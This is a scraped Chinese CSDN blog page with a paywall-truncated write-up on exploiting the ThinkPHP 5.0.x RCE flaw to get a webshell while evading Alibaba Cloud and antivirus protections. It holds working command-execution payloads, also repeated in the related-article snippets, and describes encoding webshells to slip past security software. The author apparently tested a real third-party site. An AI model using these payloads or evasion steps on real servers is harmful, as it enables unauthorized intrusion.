thinkphp 5.0.3 rce getshell_TPRCE绕过阿里云防护Getshell

最新推荐文章于 2024-03-15 12:00:00 发布
最新推荐文章于 2024-03-15 12:00:00 发布
阅读量1.4k 收藏 1
点赞数
文章标签: thinkphp 5.0.3 rce getshell
本文探讨了ThinkPHP 5.0.3远程代码执行(RCE)漏洞利用时如何绕过阿里云主机的安全防护,包括360安全卫士、服务器安全狗和Windows Defender的限制。作者分享了利用certutil进行Webshell编码上传的方法,以避免被安全软件拦截,并建议在测试环境中进行进一步的实验。
摘要由CSDN通过智能技术生成
声明:该公众号大部分文章来自作者日常学习笔记,也有少部分文章是经过原作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。

请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。

0x01 前言

这篇文章记录的是笔者在阅读某公众号发布的“ 记一次对****某校区失败的渗透测试 ”文章时发现存在漏点,找到目标站点并对原文章作者在Getshell时遇到的问题进行了一些测试,Getshell失败的原因他认为是Assert、Eval被禁用或者360安全防护问题,其实都不是。
漏点处出在Burpsuite请求/响应包中以及****等关键字。

66b0b1bc492ab48441a68b45945f4837.png

0x02 TP-RCE漏洞利用与杀软对比

这是一个后台登录页,基于ThinkPHP V5.0.20框架,可利用ThinkPHP 5.0.0~5.0.23 RCE漏洞直接执行系统命令,不同小版本之间利用的Payload可能会有些差别。 
_method=__construct&filter=system&a=whoamihttp://192.168.1.7/ThinkPHP/public/index.php?s=captchapost_poc1:_method=__construct&filter[]=system&method=get&get[]=whoamipost_poc2:_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=whoami

0cbed2b46e428024d41bfa8a28ce70d6.png

通过与tasklist /sv

最低0.47元/天 解锁文章
weixin_39706127
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
thinkphp 5.0.3 rce getshell_关于ThinkPHP的一些渗透方式
weixin_39879674的博客
11-22 1785
ThinkPHP是一个快速、兼容而且简单的轻量级国产PHP开发框架,可以支持Windows/Unix/Linux等服务器环境,正式版需要PHP5.0以上版本支持,支持MySql、PgSQL、Sqlite多种数据库以及PDO扩展。Runtime日志在ThinkPHP3的版本中,入口文件index.php是跟应用目录、框架目录在同一个目录下的,在DEBUG开启的状态下,会在runtime生成日志文件,...
thinkphp/5.0.23-rce漏洞复现
qq_46804551的博客
04-22 920
环境搭建 访问your-ip:8080 环境搭建成功 漏洞复现 thinkphp 5.0.23(完整版)debug模式 32、(post)public/index.php (data)_method=__construct&filter[]=system&server[REQUEST_METHOD]=touch%20/tmp/xxx thinkphp 5.0.23(完整版) 33、(post)public/index.php?s=captcha (data) _method=__co
Thinkphp5 RCE漏洞
Sentiment的博客
05-21 7124
影响版本 5.0.0<=ThinkPHP5<=5.0.23 、5.1.0<=ThinkPHP<=5.1.30 不同版本payload不同,且5.13版本后还与debug模式有关 这里跟着feng师傅复现的,所以用的也是5.0.22 ThinkPHP5.0.22完整版 - ThinkPHP框架 5.0.22debug模式RCE 这波属实下饭了,开启debug模式后payload一直没打通,后来发现改成其他版本的配置文件了.........
一次实战中对tp5网站getshell方式的测试
渗透测试研究中心
01-12 783
0x00 前言之前接触tp5的站比较少,只知道利用RCE漏洞getshell的方式。在最近对一个发卡平台渗透的过程中,由于php版本限制,无法直接使用RCE的payload拿shell,于是结合该网站尽可能多的测试一下tp5+php7.1环境下的getshell方法。0x02 正文拿到站点后,访问首页如下测试中,发现是thinkphp的站,报错如下不过看不出来具体版本,不确定是否存在RCE,于是...
Thinkphp5.0.0~5.0.23 RCE漏洞复现分析
cosmoslin的博客
11-19 6199
漏洞概要 漏洞存在于 ThinkPHP 底层没有对控制器名进行很好的合法性校验,导致在未开启强制路由的情况下,用户可以调用任意类的任意方法,最终导致 远程代码执行漏洞 的产生。 环境搭建: Phpstudy: OS: Windows PHP: 7.3.4 ThinkPHP: 5.0.22 POC http://xxxxxx.xxx/public/?s=captcha Body _method=__construct&filter[]=system&method=get&get.
ThinkPHP v5.x命令执行利用工具(可getshell
11-19
在这个场景中,"ThinkPHP v5.x命令执行利用工具(可getshell)"指的是一个专门针对ThinkPHP v5.x版本的安全漏洞进行利用的工具,该工具能够使得攻击者通过命令执行漏洞获取服务器的shell访问权限。 命令执行漏洞...
python3编写ThinkPHP命令执行Getshell的方法
09-19
### Python3 编写 ThinkPHP 命令执行 Getshell 的方法详解 #### 一、背景介绍 在 Web 应用开发中,ThinkPHP 是一个非常流行的 PHP 框架,因其良好的性能与丰富的功能而受到众多开发者的青睐。然而,任何框架或技术...
ThinkPHP_getshell-v2.zip
11-11
标题“ThinkPHP_getshell-v2.zip”提示我们关注的是与ThinkPHP框架相关的安全问题,特别是一个可能导致getshell的漏洞。Getshell通常指的是攻击者能够通过某种方式在目标服务器上执行命令,这通常与代码注入漏洞相关...
记一次tp5.0.24 getshell1
08-03
"记一次tp5.0.24 getshell" 在这篇文章中,我们将探讨一个关于TP5.0.24版本的getshell漏洞的记录。TP5.0.24是ThinkPHP框架的其中一个版本,该框架是一种流行的PHP开发框架。 首先,我们需要了解TP5.0.24的特点。TP...
thinkphp5调用shell脚本_【漏洞复现】ThinkPHP5 5.x 远程命令执行(getshell)
weixin_39906358的博客
01-16 318
0x00复现环境0x01步骤0x02漏洞原理分析关键代码在修复之前程序未对控制器进行过滤,导致攻 击 者可以通过引入 \ 符号来调用任意类方法。$this -> app -> controller 方法来实例化控制器,然后调用实例中的方法。follow the controller method:thinkphp/library/think/App.php通过parseModuleAn...
记录一期Thinkphp5 WebShell木马渗透的经历, 加修复建议
DWH的博客
12-26 8225
ThinkPHP的宗旨是简化开发、提高效率、易于扩展,其在对数据库的支持方面已经包括MySQL、MSSQL、Sqlite、PgSQL、 Oracle,以及PDO的支持。ThinkPHP有着丰富的文档和示例,框架的兼容性较强,但是其功能有限,因此更适合用于中小项目的开发。 但是漏洞也层出不穷,有一天发现自己的的小程序突然打不开了, What ??? 小小的网站也被墙了? 之前抱着一种心态 想着 这么小的网站谁想搞你 然后对网络安全方面视而不理,结果有一天 被啪啪打脸!! 当时很惊慌,未了解网络渗透方面的知识
thinkphp 3.x rce分析
最新发布
星星我啊,已经很努力在学习了, 有人一起学习吗?Ziansec-1
03-15 218
这个$_filename其实就是缓存文件,缓存文件的内用就是页面的php代码,从而进行了文件包含。通过观察$content的值的变化来确定漏洞点,因为要返回到页面上。通过调试找到漏洞点,并缩小范围,可以发现漏洞点在fetch中。注意:在这里如果直接在浏览器中输入内容的话会被转义。最后在这里造成了变量覆盖,最后导致命文件包含。如果使用burp改包的话就可以绕过rul编码。2.2 assign变量覆盖导致rce。覆盖了$_content,造成rce。会命令执行模块中的内容。在这里产生了变量覆盖。
网络安全深入学习第一课——热门框架漏洞(RCE-命令执行)
p36273的博客
09-16 667
----- 应用有时需要调用一些执行系统命令的函数,比如php中的system、exec、shell_exec、passthru、popen等,当用户调用这些函数时,就可以将恶意系统命令拼接到正常命令中,从而造成命令执行攻击,这就是命令执行漏洞。------命令执行产生原因:Web应用的脚本代码在执行命令的时候过滤不严,从而注入一段攻击者能够控制的代码,在服务器上执行恶意指令。------ 命令执行漏洞是PHP应用程序中最常见的漏洞之一。------ 命令执行漏洞:直接调用操作系统命令。
实战RCE绕过getshell曲折经历
zkaqlaoniao的博客
01-17 922
需要注意的是,如果直接使用exec函数族调用该木马,依旧会在时间超时后掉线,因为其依赖于创建它的php-fpm进程,php-fpm进程退出,该木马进程也会退出,所以以上代码使用了开启子进程的方式加载木马,这样可以脱离php-fpm进程,达到持续运行的效果。虽然成功上线,但是过一会就自己会掉线,经过测试发现这是php-fpm进程的问题,由于php-fpm进程加载的so文件,所以php-fpm进程结束时,会话自动掉线,php-fpm受到php脚本执行超时时间影响,导致时间一到就会退出php-fpm进程。
thinkphp 5-rcerce漏洞getshell
weixin_51692662的博客
11-03 3032
thinkphp 5-rcerce漏洞getshell
威胁快报| ThinkPHP v5 新漏洞攻击案例首曝光,阿里云已可告警并拦截 ...
测试0901-1
12-20 378
2018年12月10日,ThinkPHP v5系列发布安全更新,修复了一处可导致远程代码执行的严重漏洞。阿里云态势感知已捕获多起基于该漏洞的真实攻击,并对该漏洞原理以及漏洞利用方式进行分析。现在,对于云上未及时进行系统更新的用户,阿里云态势感知已提供攻击告警,WAF产品支持同步拦截,目前云上客户基本未受到影响。 此次漏洞由ThinkPHP v5框架代码问...
复现ThinkPHP5 5.0.23远程代码执行漏洞 Thinkphp5 5.0.22/5.1.29远程代码执行漏洞
记录笔记
04-12 500
ThinkPHP5 5.0.23远程代码执行漏洞 http://159.75.16.25:8089/index.php?s=captcha会出现如下报错 F12进入开发者 用HackBar 插件发送 POST 请求 得到回显: 通过echo命令写入 Webshell 文件 首先将一句话木马进行 Base64 编码 _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo -n YWE
Thinkphp5 5.0.22/5.1.29远程代码执行漏洞+webshell工具连接(复现详细过程)
m0_52701599的博客
03-19 2874
Thinkphp5 5.0.22/5.1.29远程代码执行漏洞
Thinkphp5.0.0~5.0.23版本远程代码执行漏洞导致网站被挂马
m0_37360803的博客
03-11 1749
最近发现多个Thinkphp5开发的网站被挂马,导致首页被篡改,其他页面无法正常访问的情况。 木马中均包含以下代码: define(‘Viv, bebegim.’,‘Denzel-你的英雄’); 经过检查,这些攻击是利用了Thinkphp5.0.0~5.0.23版本远程进行代码调用的漏洞进行的getshell。 漏洞的详细原理参见:https://seaii-blog.com/index.php/...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值